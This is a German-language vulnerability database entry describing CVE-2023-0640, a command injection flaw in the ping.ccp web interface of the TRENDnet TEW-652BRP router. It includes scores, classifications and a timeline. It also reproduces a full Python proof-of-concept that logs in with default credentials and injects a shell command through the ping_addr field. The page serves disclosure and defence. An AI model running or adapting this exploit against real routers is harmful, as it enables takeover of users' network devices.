CVSS Meta Temp Score | Aktueller Exploitpreis (≈) | CTI Interest Score |
---|---|---|
7.8 | $0-$5k | 0.10 |
Es wurde eine kritische Schwachstelle in TRENDnet TEW-652BRP 3.04b01 ausgemacht. Es betrifft eine unbekannte Funktion der Datei ping.ccp der Komponente Web Interface. Durch das Beeinflussen mit einer unbekannten Eingabe kann eine erweiterte Rechte-Schwachstelle ausgenutzt werden. Im Rahmen von CWE wurde eine Klassifizierung als CWE-77 vorgenommen. Es ist nicht genau bekannt, welche Auswirkungen ein erfolgreicher Angriff haben wird.
Die Schwachstelle wurde am 02.02.2023 publik gemacht. Die Verwundbarkeit wird unter CVE-2023-0640 geführt. Es sind sowohl technische Details als auch ein öffentlicher Exploit zur Schwachstelle bekannt. Das MITRE ATT&CK Projekt deklariert die Angriffstechnik als T1202.
Ein öffentlicher Exploit wurde in Python entwickelt. Der Download des Exploits kann von vuldb.com geschehen. Er wird als proof-of-concept gehandelt. Der durch den Exploit genutzte Code gestaltet sich wie folgt:
import requests,socket import re import time from urllib.parse import urlencode username = 'admin' password = 'admin' device_web_ip = '192.168.10.1' ping_target_ip = '192.168.10.2' headers = {'Host': '{}'.format(device_web_ip), 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8', 'Accept-Language': 'en-US,en;q=0.5', 'Accept-Encoding': 'gzip, deflate', 'Content-Type': 'application/x-www-form-urlencoded', 'Origin': 'http://{}'.format(device_web_ip), 'Connection': 'keep-alive', 'Referer': 'http://{}/ping_test.htm'.format(device_web_ip), 'Upgrade-Insecure-Requests': '1'} login_params = 'html_response_page=login_fail.htm&login_name=&username={0}&password={1}&curr_language=0&login_n={0}&login_pass={1}&lang_select=0&login=Login'.format(username,password) login_url = 'http://{}/login.ccp'.format(device_web_ip) r = requests.post(url=login_url, data=login_params, headers=headers, timeout=0.2) if r is None or r.status_code != 200: print('Login wrong, please retry!') exit() params = { 'ccp_act': 'ping_v4', 'nextPage': 'ping_back.htm', 'html_response_page': 'ping_back.htm', 'html_response_message': 'The+setting+is+saved.', 'html_response_return_page': 'ping_test.htm', 'ping_addr': 'abcd"$(ping -c 1 {})"'.format(ping_target_ip), 'ping': 'Ping', 'deviceList': '', '/friendlyName': '' } method = 'POST' url = 'http://{}/ping.ccp'.format(device_web_ip) try: r = requests.request(method=method,url=url,headers=headers,data=params,verify=False,timeout=0.2) r = requests.request(method=method,url=url,headers=headers,data=params,verify=False,timeout=0.2) except: pass
Es sind keine Informationen bezüglich Gegenmassnahmen bekannt. Der Einsatz eines alternativen Produkts bietet sich im Zweifelsfall an.
Produkt
Hersteller
Name
Version
Lizenz
CPE 2.3
CPE 2.2
CVSSv4
VulDB CVSS-B Score: 🔍VulDB CVSS-BT Score: 🔍
VulDB Vector: 🔍
VulDB Zuverlässigkeit: 🔍
CVSSv3
VulDB Meta Base Score: 8.1VulDB Meta Temp Score: 7.8
VulDB Base Score: 7.2
VulDB Temp Score: 6.5
VulDB Vector: 🔍
VulDB Zuverlässigkeit: 🔍
NVD Base Score: 9.8
NVD Vector: 🔍
CNA Base Score: 7.2
CNA Vector (VulDB): 🔍
CVSSv2
AV | AC | Au | C | I | A |
---|---|---|---|---|---|
💳 | 💳 | 💳 | 💳 | 💳 | 💳 |
💳 | 💳 | 💳 | 💳 | 💳 | 💳 |
💳 | 💳 | 💳 | 💳 | 💳 | 💳 |
Vektor | Komplexität | Authentisierung | Vertraulichkeit | Integrität | Verfügbarkeit |
---|---|---|---|---|---|
freischalten | freischalten | freischalten | freischalten | freischalten | freischalten |
freischalten | freischalten | freischalten | freischalten | freischalten | freischalten |
freischalten | freischalten | freischalten | freischalten | freischalten | freischalten |
VulDB Base Score: 🔍
VulDB Temp Score: 🔍
VulDB Zuverlässigkeit: 🔍
NVD Base Score: 🔍
Exploiting
Klasse: Erweiterte RechteCWE: CWE-77 / CWE-74 / CWE-707
CAPEC: 🔍
ATT&CK: 🔍
Lokal: Nein
Remote: Ja
Verfügbarkeit: 🔍
Zugang: öffentlich
Status: Proof-of-Concept
Programmiersprache: 🔍
Download: 🔍
EPSS Score: 🔍
EPSS Percentile: 🔍
Preisentwicklung: 🔍
Aktuelle Preisschätzung: 🔍
0-Day | freischalten | freischalten | freischalten | freischalten |
---|---|---|---|---|
Heute | freischalten | freischalten | freischalten | freischalten |
Threat Intelligence
Interesse: 🔍Aktive Akteure: 🔍
Aktive APT Gruppen: 🔍
Gegenmassnahmen
Empfehlung: keine Massnahme bekanntStatus: 🔍
0-Day Time: 🔍
Timeline
02.02.2023 🔍02.02.2023 🔍
02.02.2023 🔍
01.03.2023 🔍
Quellen
Status: Nicht definiertCVE: CVE-2023-0640 (🔍)
scip Labs: https://www.scip.ch/?labs.20161013
Eintrag
Erstellt: 02.02.2023 09:18Aktualisierung: 01.03.2023 17:07
Anpassungen: 02.02.2023 09:18 (39), 02.02.2023 09:19 (2), 01.03.2023 17:01 (2), 01.03.2023 17:07 (28)
Komplett: 🔍
Einsender: leetsun
Submit
Akzeptiert
- Submit #77217: Command injection on TRENDnet router TEW-652BRP (von leetsun)
Bisher keine Kommentare. Sprachen: de + en.
Bitte loggen Sie sich ein, um kommentieren zu können.